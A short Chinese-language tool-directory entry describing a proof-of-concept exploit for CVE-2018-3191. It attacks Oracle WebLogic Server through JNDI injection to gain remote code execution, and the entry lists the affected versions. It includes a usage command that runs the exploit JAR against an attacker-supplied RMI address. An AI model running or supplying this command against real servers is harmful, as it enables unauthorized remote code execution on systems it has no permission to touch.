黑客、渗透测试和网络安全工具,武装您的安全武器库!
针对 CVE-2018-3191 的概念验证漏洞利用,通过 JNDI 注入攻击 WebLogic Server。投递 JAR 载荷,借助 Spring JNDI 触发远程代码执行。
发现我们社区最常用的工具。
探索所有工具
浏览我们的工具集合
用法:
java -jar weblogic-spring-jndi.jar <jndi_address>
示例:
java -jar weblogic-spring-jndi.jar rmi://<IP>:1099/Object
注意:
12.2.1.3
10.3.6.0 12.2.1.0 12.1.3.0 12.2.1.1